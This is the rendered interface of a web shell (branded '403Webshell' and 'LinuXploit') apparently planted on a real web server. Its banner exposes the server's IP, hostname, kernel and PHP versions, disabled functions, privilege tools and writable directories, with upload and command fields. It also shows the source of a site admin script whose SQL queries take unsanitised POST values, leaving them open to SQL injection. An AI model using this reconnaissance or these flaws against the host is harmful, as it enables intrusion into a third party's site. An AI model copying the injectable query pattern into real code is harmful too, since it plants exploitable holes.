403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)yuecreations.com.hk/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)yuecreations.com.hk/webadmin/productgrade_add.php
<?php require("configure.php"); 

$DescEN	= htmlspecialchars($_POST["DescEN"],ENT_QUOTES);
$DescTC	= htmlspecialchars($_POST["DescTC"],ENT_QUOTES);
//$ProductColDate		= htmlspecialchars($_POST["ProductColDate"],ENT_QUOTES);
$Sort			= $_POST["Sort"];
$ProductCatId	= $_POST["ProductCatId"];
//print_r($_POST); 
/*
// copy image 
if ($_FILES['ProductCatCover']['name'] <> '')
{
	copy ($_FILES['ProductCatCover']['tmp_name'], "productcover/".$ProductCatId."_".$_FILES['ProductCatCover']['name']) 
		or die ("Could not copy");
		 
	$ProductCatCover = $ProductCatId."_".$_FILES['ProductCatCover']['name'];

	$image = "productcover/".$ProductCatId."_".$_FILES['ProductCatCover']['name'];
	createthumb($image, $image, 120, 120);

}
else
{	
	$ProductCatCover = "";
}
// End upload image code

function createthumb($name,$filename,$new_w,$new_h)
	{
	$system=explode('.',$name);
	if (preg_match('/jpg|jpeg|JPG|JPEG/',$system[1])){
		$src_img=imagecreatefromjpeg($name);
	}
	if (preg_match('/gif|GIF/',$system[1])){
		$src_img=imagecreatefromgif($name);
	}
	if (preg_match('/png|PNG/',$system[1])){
		$src_img=imagecreatefrompng($name);
	}

	$old_x=imageSX($src_img);
	$old_y=imageSY($src_img);
	if ($old_x > $old_y) {*/
		/*$thumb_w=$new_w;
		$thumb_h=$old_y*($new_h/$old_x);*//*
		$thumb_w=$old_x*($new_w/$old_y);
		$thumb_h=$new_h;
	}
	if ($old_x < $old_y) {
		$thumb_w=$old_x*($new_w/$old_y);
		$thumb_h=$new_h;
	}
	if ($old_x == $old_y) {
		$thumb_w=$new_w;
		$thumb_h=$new_h;
	}

	$dst_img = imagecreatetruecolor($thumb_w,$thumb_h);
	imagecopyresampled($dst_img,$src_img,0,0,0,0,$thumb_w,$thumb_h,$old_x,$old_y); 
	$red = imagecolorallocate($dst_img, 255, 0, 0);
	$green = imagecolorallocate($dst_img, 0, 255, 0);
	$blue = imagecolorallocate($dst_img, 0, 0, 255);
	$black = imagecolorallocate($dst_img, 0, 0, 0);
	// Make the background transparent
	imagecolortransparent($dst_img, $black);

	// Draw a red rectangle
	imagefilledrectangle($dst_img, 4, 4, 50, 25, $red, $green, $blue);


	if (preg_match("/png|PNG/",$system[1])){		
		imagepng($dst_img, './imagecolortransparent.png'); 
	} else if (preg_match("/gif|GIF/",$system[1])) {
		imagegif($dst_img, './imagecolortransparent.gif'); 
	} else {
		imagejpeg($dst_img,$filename); 
	}
	imagedestroy($dst_img); 
	imagedestroy($src_img); 
}*/


if ($Sort == '' || $Sort == '0') {
	$sql = "select max(Sort) as maxid ";
	$sql .= "from ProductGrade where ProductCatId = $ProductCatId";
	//echo $sql;
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result,MYSQL_ASSOC);
	$Sort = $row{maxid}+1;
}
if( mysql_num_rows(mysql_query("SELECT ProductGradeId FROM ProductGrade WHERE ProductCatId = $ProductCatId AND Sort=$Sort ")) > 0){
	mysql_query("UPDATE ProductGrade SET Sort= Sort+1 WHERE ProductCatId = $ProductCatId AND Sort >=$Sort ");
}

$sql = "insert into ProductGrade (ProductGradeId, ProductCatId, DescEN, DescTC, Sort) values ('$ProductGradeId', '$ProductCatId', '$DescEN', '$DescTC', '$Sort')";
//echo $sql;
mysql_query($sql);
if( mysql_errno() > 0 ){
	echo 'Product Category Add Error:<br />'. mysql_error() .'<br />SQL: '. $sql;
	exit;
}

mysql_close($dbh);

header("Location: productgrade_index.php?msg=Add Successful");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit